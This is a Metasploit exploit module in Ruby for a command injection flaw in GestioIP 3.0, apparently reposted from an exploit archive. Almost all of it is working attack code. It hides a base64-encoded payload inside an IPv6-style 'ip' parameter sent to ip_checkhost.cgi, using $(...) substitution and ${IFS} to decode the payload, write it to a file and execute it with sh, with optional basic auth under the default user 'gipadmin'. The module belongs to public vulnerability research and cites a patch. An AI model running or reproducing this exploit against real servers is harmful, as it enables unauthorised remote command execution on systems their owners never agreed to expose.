GestioIP Remote Command Execution Exploit

:
08.10.2013
:
GestioIP
:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'GestioIP Remote Command Execution',
'Description' => %q{
This module exploits a command injection flaw to create a shell script
on the filesystem and execute it. If GestioIP is configured to use no authentication,
no password is required to exploit the vulnerability. Otherwise, an authenticated
user is required to exploit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' #Initial Discovery and metasploit module
],
'References' =>
[
[ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
],
'Payload' =>
{
'Space' => 475, # not a lot of room
'DisableNops' => true,
'BadChars' => "",
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic GestioIP 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Oct 4 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
OptString.new('PASSWORD', [false, 'The password to auth with', nil])
], self.class)
end

def user
datastore['USERNAME']
end

def pass
datastore['PASSWORD']
end

def use_auth
!(pass.nil? or pass.empty?)
end

def exploit

pay = Rex::Text.encode_base64(payload.encoded)
file = Rex::Text.rand_text_alpha(8)

options = {
'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
'encode_params' => false,
'vars_get' => {
'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
'hostname' => "fds",
'client_id' => "1",
'ip_version' => ""
}
}

if use_auth
options.merge!('authorization' => basic_auth(user,pass))
end

res = send_request_cgi(options)

if res and res.code == 401
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
end

end
end